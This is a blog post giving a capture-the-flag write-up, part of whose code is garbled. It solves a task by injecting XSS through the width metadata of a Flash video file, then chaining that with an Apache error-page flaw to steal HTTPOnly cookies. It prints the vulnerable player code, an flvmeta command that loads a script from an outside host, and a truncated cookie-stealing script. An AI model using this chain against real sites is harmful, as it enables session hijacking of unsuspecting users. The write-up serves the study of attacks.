→ Forbiddenbits - Task 3

| No TrackBacks
Task 3 Solution

The truth lays behind the earth --> hint to Flash-based .flv player.
After player decompilation we can see a vulnerable part of code. There was exploitable XSS through .flv metadata (width and height fields):
ns.onMetaData = function (obj)
  metaWidth = obj.width;
  metaHeight = obj.height;
  duration = obj.duration;
  flv._visible = 1;
  if (jsCallback)
    getURL("javascript:flvStart(\'" + metaWidth + "\',\'" + metaHeight + "\')", "");
  } // end if
Then we thought about newest vulnerability in Apache with default 400-error page (http://www.exploit-db.com/exploits/18442/), which allows to steal a HTTPOnly-protected cookies. So we made a malicious .flv-file with modified metadata.

Here was a little problem: flvmeta editor could only add metatags to .flv, and in final .flv file we had a duplicated metainfo. To avoid this bug some strings in flvmeta were commented.
Patch for flvmeta (info.c):
amf_associative_array_add(meta->on_metadata, "lastkeyframetimestamp", amf_nu
if (info->video_width > 0)
amf_associative_array_add(meta->on_metadata, "width", amf_number_new(inf
if (info->video_height > 0)
amf_associative_array_add(meta->on_metadata, "height", amf_number_new(in

video_data_rate = ((info->real_video_data_size / 1024.0) * 8.0) / duration;

Then we made a EVIL.flv file, which injects a JS-sploit into htmlpage, and finally this sploit stole ALL user cookies. Link to this magic file was sended through feedback form on site.


./flvmeta -U --add=width="'+(e=document.createElement('script'),e.src='http://kyprizel.net/ctf/pureevilpart3.js',document.body.appendChild(e))+'" EVIL.flv

JS pureevilpart3.js:
var today = new Date();
var expire = new Date();
expire.setTime(today.getTime() + 2000);
for (j=0;j<=1000;++j) 
for (i=0;i < 10; ++i) 
  document.cookie="z"+i+"="+padding+"; expires="+expire.toGMTString()+"; path=/;"
function handler() 
  if (!gotCookie && this.responseText.length > 1) 
    text = /(Cookie[^;]*)/i.exec(this.responseText);
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = handler;
xhr.open("GET", "/httponly.php");

No TrackBacks

TrackBack URL: http://smokedchicken.org/m/mt-tb.cgi/66

About this Entry

This page contains a single entry by Юрий Леонычев published on February 13, 2012 3:40 PM.

Forbiddenbits - Task 2 was the previous entry in this blog.

Codegate Quals - Forensic 100 is the next entry in this blog.

Find recent content on the main index or look in the archives to find all content.